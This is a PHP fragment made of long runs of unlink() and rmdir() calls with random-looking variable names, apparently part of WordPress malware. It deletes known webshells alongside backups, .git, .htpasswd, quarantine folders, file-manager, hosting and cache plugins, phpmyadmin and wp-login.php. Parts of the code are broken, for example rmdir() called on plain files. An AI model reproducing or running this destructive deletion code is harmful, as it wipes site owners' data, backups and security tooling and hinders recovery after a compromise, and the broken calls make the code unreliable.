$iotnrt = unlink($os."redirect-jacob-pro.php");
$iotnru = unlink($os."redirect-jacob-x1.php");
$iotnrv = unlink($os."extract-zip.php");
$iotnrw = unlink($os."rom.php");
$iotnrx = unlink($os."user.php");
$iotnry = unlink($os."recollection.php");
$iotnrz = unlink($os."autoload_classmap.php");
$iotnsa = unlink($os."op-server-scanner.php");
$iotnsb = unlink($os.".htaccess.orig");
$iotnsc = unlink($os."installer-backup.php");
$iotnsd = unlink($os."wp-mailrpc.php");
$iotnse = unlink($os."userfuns.php");
$iotnsf = unlink($os."wp-content/userfuns.php");
$iotnsg = unlink($os."124.php");
$iotnsh = unlink($os."ray.php");
$iotnsi = unlink($os."adminer-4.8.1.php");
$iotnsj = unlink($os."bionic.php");
$iotnsk = unlink($os."cd.php");
$iotnsl = unlink($os."cetvel.php");
$iotnsm = unlink($os."hidey.php");
$iotnsn = unlink($os."pi.php");
$iotnso = unlink($os."xmlpsyeni.php");
$iotnsp = unlink($os."wp-content/plugins/shell/mini.php");
$iotnsq = unlink($os."wp-content/plugins/shell/index.php");
$iotnsr = unlink($os."wp-config/ss.php");
$iotnss = unlink($os."wp-config/wp-conflg.php");
$iotnst = unlink($os.".private");
$iotnsu = unlink($os."1index.php");
$iotnsv = unlink($os."default.php");
$iotnsw = unlink($os."index1.php");
$iotnsx = unlink($os."index1111.html");
$iotnsy = unlink($os."local-phpinfo.php");
$iotnsz = unlink($os."installer.php");
$iotnta = unlink($os."alfa.php");
$iotntb = unlink($os."12.php");
$iotntc = unlink($os.".htpasswd");
$iotntd = unlink($os."china.php");
$iotnte = unlink($os."wp-content/sunrise.php");
$iotntf = unlink($os.".htaccessolds");
$iotntg = unlink($os."wp-user.php");
$iotnth = unlink($os."crot666.php");
$iotnti = unlink($os."worksec.php");
$iotntj = unlink($os."wp-content/worksec.php");
$iotntk = unlink($os."bypass.php");
$iotntl = unlink($os."moon.php");
$iotntm = unlink($os."activate.php");
$iotntn = unlink($os."reset.php");
$iotnto = unlink($os."wp-activatenvv.php");
$iotntp = unlink($os."wp-activatenz.php");
$a1 = rmdir($os."wp-login.php");
$a2 = rmdir($os."xmlrpc.php");
$a3 = rmdir($os.".tmb");
$a4 = rmdir($os.".htaccess_old");
$a5 = rmdir($os."sa.php");
$a6 = rmdir($os."wp-update.php");
$a7 = rmdir($os."wp-content/plugins/wp-file-manager/");
$a8 = rmdir($os."cgi-bin");
$a9 = rmdir($os.".well-known");
$b1 = rmdir($os."about.php");
$b2 = rmdir($os."error_log");
$b3 = rmdir($os."dead.letter");
$b4 = rmdir($os.".litespeed_flag");
$b5 = rmdir($os.".hcflag");
$b6 = rmdir($os.".rnd");
$b7 = rmdir($os."vzh.txt");
$b8 = rmdir($os."wp-aa.php");
$b9 = rmdir($os."wp-content/plugins/seox");
$c1 = rmdir($os."wp-content/plugins/Uwogh-Segs");
$c2 = rmdir($os."wp-content/plugins/exe");
$c3 = rmdir($os."wp-content/plugins/erinyani");
$c4 = rmdir($os."wp-content/plugins/std");
$c5 = rmdir($os."wp-content/plugins/xisikusu");
$c6 = rmdir($os."wp-content/plugins/aqumug");
$c7 = rmdir($os."wp-content/plugins/wp");
$c8 = rmdir($os."wp-content/plugins/seoo");
$c9 = rmdir($os."wp-content/plugins/plugin");
$d1 = rmdir($os."wp-content/plugins/sphinx");
$d2 = rmdir($os."theme");
$d3 = rmdir($os."wp-content/plugins/l5t9pjky");
$d4 = rmdir($os."wp-content/plugins/Occasio7");
$d5 = rmdir($os."wp-content/plugins/peti");
$d6 = rmdir($os."wp-content/plugins/candu");
$d7 = rmdir($os."wp-content/plugins/canda");
$d8 = rmdir($os."wp-content/plugins/uitny891");
$d9 = rmdir($os."wp-content/plugins/b46d88ba88073915e802b08a4ac35614");
$e1 = rmdir($os."wp-content/plugins/x7");
$e2 = rmdir($os."wp-content/plugins/53n311n3");
$e3 = rmdir($os."wp-content/plugins/null");
$e4 = rmdir($os."wp-content/plugins/ytakkjn");
$e5 = rmdir($os."wp-content/plugins/yokr8x0t");
$e6 = rmdir($os."wp-content/plugins/EasySEO");
$e7 = rmdir($os."wp-content/plugins/Ioxi");
$e8 = rmdir($os."wp-content/plugins/Obmrzxv");
$e9 = rmdir($os."wp-content/plugins/adkvuah");
$f1 = rmdir($os."wp-content/plugins/mtoqxmb");
$f2 = rmdir($os."wp-content/plugins/pp");
$f3 = rmdir($os."wp-content/plugins/eyhrxrs");
$f4 = rmdir($os."wp-content/plugins/seooyanz");
$f5 = rmdir($os."wp-content/plugins/cep20e00");
$f6 = rmdir($os."wp-content/plugins/ynrgmwp");
$f7 = rmdir($os."wp-content/plugins/7af063e7286f6b4a8c77d80cc6a669ec");
$f8 = rmdir($os."wp-content/plugins/bzkocikcde");
$f9 = rmdir($os."wp-content/plugins/ovlkfzyewj");
$g1 = rmdir($os."wp-content/plugins/eriyani");
$g2 = rmdir($os."wp-content/plugins/rar");
$g3 = rmdir($os."wp-content/plugins/rzbaoem");
$g4 = rmdir($os."wp-content/plugins/gherhdz");
$g5 = rmdir($os."wp-content/plugins/rdzcpsq");
$g6 = rmdir($os."wp-content/plugins/turymci");
$g7 = rmdir($os."wp-content/plugins/seobacklink");
$g8 = rmdir($os."wp-content/plugins/cxiehla");
$g9 = rmdir($os."wp-content/plugins/d0s08vwy");
$h1 = rmdir($os."wp-content/plugins/MonarkSeo");
$h2 = rmdir($os."wp-content/plugins/jkvfuypcye");
$h3 = rmdir($os."wp-content/plugins/filester");
$h4 = rmdir($os."wp-content/plugins/pkgckjjpjv");
$h5 = rmdir($os."wp-content/plugins/qnbejcbaui");
$h6 = rmdir($os."wp-content/plugins/tlhhsxx");
$h7 = rmdir($os."wp-content/plugins/jnnanol");
$h8 = rmdir($os."wp-content/plugins/lol");
$h9 = rmdir($os."wp-content/plugins/view-source");
$i1 = rmdir($os."wp-content/plugins/659521b8c3d70b0e2e67224812a072d0");
$i2 = rmdir($os."wp-content/plugins/71f6d81d6848fc0cba57b48c677531e2");
$i3 = rmdir($os."wp-content/plugins/1NRjuJn3nvggU4tEcmUMTiw94EWzCMrBUv");
$i4 = rmdir($os."wp-content/plugins/28592a31ece6380c33ef7f1c5b762ae9");
$i5 = rmdir($os."wp-content/plugins/mepr-i18n");
$i6 = rmdir($os."wp-content/plugins/buddyboss-theme-child.zip");
$i7 = rmdir($os."wp-content/plugins/buddyboss-theme.zip");
$i8 = rmdir($os."__MACOSX");
$i9 = rmdir($os."wp-content/plugins/__MACOSX");
$j1 = rmdir($os."NewFolder");
$j2 = rmdir($os."es");
$j3 = rmdir($os."ss");
$j4 = rmdir($os."conf");
$j5 = rmdir($os."wp-content/plugins/file-manager-advanced");
$j6 = rmdir($os."old");
$j7 = rmdir($os."wp-content/plugins/maintenance");
$j8 = rmdir($os."wp-content/maintenance");
$j9 = rmdir($os.".git");
$k1 = rmdir($os."lost+found");
$k2 = rmdir($os.".devpanel");
$k3 = rmdir($os.".vscode");
$k4 = rmdir($os."backup(1)");
$k5 = rmdir($os."backup");
$k6 = rmdir($os.".litespeed_conf.dat");
$k7 = rmdir($os."custom_debug.log");
$k8 = rmdir($os.".wp-cli");
$k9 = rmdir($os."bb-config.php");
$l1 = rmdir($os."n4r5n156");
$xkxbul = rmdir($os."wp-content/et-cache-old");
$fibdhf = rmdir($os."wp-content/et-cache-old-old");
$dqdvjn = rmdir($os."wp-content/languages-old");
$wnjejs = rmdir($os."wp-content/mu-plugins-old");
$jlotoj = rmdir($os."wp-content/mu-plugins-old-old");
$hpkmct = rmdir($os."wp-content/plugins-old");
$ljvitc = rmdir($os."wp-content/plugins-old-old");
$mdhbdk = rmdir($os."wp-content/themes-old");
$pmodux = rmdir($os."wp-content/themes-old-old");
$lefhfr = rmdir($os."wp-content/themes-old-old-old");
$feffly = rmdir($os."wp-content/upgrade-temp-backup");
$itjvnn = rmdir($os."wp-content/upgrade-temp-backup-old");
$terumo = rmdir($os."wp-content/upgrade-temp-backup-old-old");
$zlfqvs = rmdir($os."wp-content/uploads-old");
$zucapw = rmdir($os."wp-content/uploads-old-old");
$tyhcda = rmdir($os."wp-content/w3tc-config-old");
$yhieii = rmdir($os."wp-content/wpo-cache-old");
$zrqssz = rmdir($os."wp-content/advanced-cache.php-old");
$upoyun = rmdir($os."wp-content/advanced-cache.php-old-old");
$islubp = rmdir($os."wp-content/db.php-old");
$daksfx = rmdir($os."wp-content/db.php-old-old");
$jilvhw = rmdir($os."wp-content/debug.log");
$lsssme = rmdir($os."wp-content/index.php-old");
$mwkdgk = rmdir($os."wp-content/object-cache.php-old");
$ymowby = rmdir($os."wp-content/object-cache.php-old-old");
$ymowbz = rmdir($os."wp-content/plugins/wp-plugin-hostgator");
$ymowaz = rmdir($os."blogs");
$ymowbz = rmdir($os."tmp");
$ymowca = rmdir($os.".thumb");
$ymowcb = rmdir($os."wp-content/plugins/uhydomoxu");
$ymowcc = rmdir($os."wp-content/plugins/hostinger");
$ymowcd = rmdir($os."ALFA_DATA");
$ymowce = rmdir($os."lianjie");
$ymowcf = rmdir($os."wp-content/plugins/fdatszo");
$ymowcg = rmdir($os."wp-content/plugins/uijucnr");
$ymowch = rmdir($os."wp-content/plugins/vgpulzmbbs");
$ymowci = rmdir($os."employee_details");
$ymowcj = rmdir($os."vendor");
$ymowck = rmdir($os."wp-content/plugins/plugins");
$ymowcl = rmdir($os."law-ta");
$ymowcm = rmdir($os."wp-content/plugins/syncdrc");
$ymowco = rmdir($os."wp-content/plugins/yluflwmslz");
$ymowcp = rmdir($os."phpmyadmin");
$ymowcq = rmdir($os."wp-content/plugins/ubh");
$ymowcr = rmdir($os."wp-content/plugins/lholluerpf");
$bwwsys = rmdir($os."well-known/acme-challenge/e/a/b/b/c");
$ymowcr = rmdir($os."well-known/pki-validation/a/a/a/a");
$uleegh = rmdir($os."well-known/pki-validation/b/b/b/b");
$slkmey = rmdir($os."well-known/pki-validation/c/c/c/c");
$noijju = rmdir($os."well-known/pki-validation/d/d/d/d");
$jxqqoq = rmdir($os."well-known/pki-validation/e/e/e/e");
$gjgqgp = rmdir($os."well-known/pki-validation/f/f/f/f");
$ftyqtq = rmdir($os."well-known/pki-validation/g/g/g/g");
$gtdjdr = rmdir($os."well-known/pki-validation/h/h/h/h");
$ymowaa = rmdir($os."wp-content/plugins/30pq7s33");
$ymowab = rmdir($os."wp-content/plugins/so-css");
$ymowac = rmdir($os."wp-content/plugins/pv");
$ymowad = rmdir($os."dup-installer");
$ymowae = rmdir($os."idcorprd");
$ymowaf = rmdir($os."p");
$ymowag = rmdir($os."wp-content/plugins/nqsnroo3");
$ymowah = rmdir($os."wp-content/plugins/ozxpgphuvj");
$ymowai = rmdir($os."8533721645");
$itqbir = rmdir($os.".well-known/acme-challenge/e/a/b/b/c");
$hahnkp = rmdir($os.".well-known/pki-validation/a/a/a/a");
$plxqbf = rmdir($os.".well-known/pki-validation/b/b/b/b");
$jyvfml = rmdir($os.".well-known/pki-validation/c/c/c/c");
$otwckk = rmdir($os.".well-known/pki-validation/d/d/d/d");
$cugzsb = rmdir($os.".well-known/pki-validation/e/e/e/e");
$ydldue = rmdir($os.".well-known/pki-validation/f/f/f/f");
$etrvbc = rmdir($os.".well-known/pki-validation/g/g/g/g");
$lgcjan = rmdir($os.".well-known/pki-validation/h/h/h/h");
$lgcjao = rmdir($os."wp-content/plugins/diablooqt");
$lgcjap = rmdir($os."wp-content/plugins/hrsgptzzxv");
$lgcjaq = rmdir($os.".well-known/acme-challenge");
$lgcjar = rmdir($os."regeneratl");
$lgcjas = rmdir($os."New Folder");
$lgcjat = rmdir($os."wp-content/plugins/litespeed-cache");
$lgcjau = rmdir($os.".idea");
$lgcjav = rmdir($os.".quarantine");
$lgcjaw = rmdir($os."error");
$lgcjax = rmdir($os.".cache");
$lgcjay = rmdir($os."log");
$lgcjaz = rmdir($os."_old");
$lgcjba = rmdir($os."COPYRIGHT");
$lgcjbb = rmdir($os.".dh-diag");
$lgcjbc = rmdir($os."dci");